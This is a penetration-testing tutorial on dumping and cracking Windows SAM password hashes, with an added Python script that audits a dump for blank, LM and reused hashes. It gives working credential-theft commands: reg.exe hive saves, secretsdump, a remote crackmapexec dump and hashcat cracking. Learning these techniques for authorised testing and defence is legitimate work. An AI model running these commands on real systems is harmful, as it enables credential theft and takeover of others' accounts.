# Attacking SAM

The Security Accounts Manager (SAM) is a database file in the Microsoft Windows operating system containing user names and password hashes.
## Locations

The files that are relevant for the SAM are placed in the Windows Registry.

| Registry Hive | Description |
|---|---|
| `hklm\sam` | Contains the hashes associated with local account passwords. |
| `hklm\system` | Contains the system bootkey, which is used to encrypt the SAM database. |
| `hklm\security` | Contains cached credentials for domain accounts. |
## Copy Registry hives with reg.exe

To copy the SAM database you need to have at least local administrator privilege.

1. Use `reg.exe` to save `hklm\sam`.

    ```
    reg.exe save hklm\sam C:\sam.save
    ```

2. Use `reg.exe` to save `hklm\system`.

    ```
    reg.exe save hklm\system C:\system.save
    ```

3. Use `reg.exe` to save `hklm\security`.

    ```
    reg.exe save hklm\security C:\security.save
    ```
## Dumping hashes with secretsdump

!!! note
    The boot key is mandatory. Dumping those hashes without the boot key is not possible, because the boot key is used to encrypt & decrypt the SAM database.

Copy the files to the attacking machine and dump the hashes with `secretsdump`. The hashes are encrypted with the bootkey, which is located in the `hklm\system` hive. Without the bootkey, the hashes cannot be decrypted.

```
impacket-secretsdump -sam sam.save -security security.save -system system.save LOCAL
```

The hashes are dumped in the following format:

```
uid:rid:lmhash:nthash
```
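As an added example (not part of the original notes), a small Python script that parses lines in secretsdump's `uid:rid:lmhash:nthash` format and flags what a defender reviews first after a SAM dump: accounts with a blank password, accounts that still have an LM hash stored, and accounts sharing the same NT hash (password reuse). The sample lines and the hash values in them are constructed for the demonstration; only the two empty-password constants are real, widely documented values.

```python
"""Audit a secretsdump-style SAM dump (uid:rid:lmhash:nthash lines)."""
import re
from collections import defaultdict

# Well-known hashes of the empty password (real constants, widely documented).
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"

# secretsdump prints uid:rid:lmhash:nthash, usually followed by ":::".
LINE_RE = re.compile(
    r"^(?P<user>[^:]+):(?P<rid>\d+):(?P<lm>[0-9a-fA-F]{32}):(?P<nt>[0-9a-fA-F]{32})(:::)?$"
)

# Constructed sample dump; the 32-hex values are placeholders, not real hashes.
SAMPLE_DUMP = """
Administrator:500:aad3b435b51404eeaad3b435b51404ee:0123456789abcdef0123456789abcdef:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
svc_backup:1001:deadbeefdeadbeefdeadbeefdeadbeef:0123456789abcdef0123456789abcdef:::
helpdesk:1002:aad3b435b51404eeaad3b435b51404ee:fedcba9876543210fedcba9876543210:::
this line is not a hash record
"""


def parse_line(line):
    """Return a dict for one dump line, or None if it does not match the format."""
    m = LINE_RE.match(line.strip())
    if m is None:
        return None
    return {
        "user": m["user"],
        "rid": int(m["rid"]),
        "lm": m["lm"].lower(),
        "nt": m["nt"].lower(),
    }


def audit(lines):
    """Parse all lines and collect the findings a reviewer cares about."""
    findings = {
        "blank_password": [],   # NT hash equals the empty-password hash
        "lm_hash_present": [],  # LM hash stored (weak legacy hash still enabled)
        "shared_nt_hash": {},   # same NT hash used by more than one account
        "unparsed": [],         # lines that did not match the expected format
    }
    accounts_by_nt = defaultdict(list)

    for line in lines:
        if not line.strip():
            continue
        rec = parse_line(line)
        if rec is None:
            findings["unparsed"].append(line.strip())
            continue
        if rec["nt"] == EMPTY_NT:
            findings["blank_password"].append(rec["user"])
        if rec["lm"] != EMPTY_LM:
            findings["lm_hash_present"].append(rec["user"])
        accounts_by_nt[rec["nt"]].append(rec["user"])

    # Reuse of the empty hash is already reported as blank_password; skip it here.
    findings["shared_nt_hash"] = {
        h: users for h, users in accounts_by_nt.items()
        if len(users) > 1 and h != EMPTY_NT
    }
    return findings


def audit_sample():
    """Run the audit over the constructed sample dump."""
    return audit(SAMPLE_DUMP.splitlines())


if __name__ == "__main__":
    for key, value in audit_sample().items():
        print(f"{key}: {value}")
```

Disabled built-in accounts such as `Guest` show up with the empty NT hash even though they cannot log on, so the `blank_password` list still needs to be checked against the account's enabled state before anyone acts on it.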
## Dumping SAM remotely

The hashes from the SAM database can also be dumped remotely with `crackmapexec`. The variables `$ip`, `$username`, and `$password` need to be replaced with the actual values. You need credentials with local admin privileges on the victim machine.

```
crackmapexec smb $ip --local-auth -u $username -p $password --lsa
```

`--lsa` dumps the LSA secrets (the `hklm\security` content); the local account hashes from `hklm\sam` are selected with `--sam`.
## Cracking hashes with hashcat

After dumping the hashes, hashcat can be used to crack the hashes to reveal the plain-text passwords.

```
sudo hashcat -m 1000 hashes.txt /usr/share/wordlists/rockyou.txt
```

- `-m 1000` => Set hash type to NTLM hashes.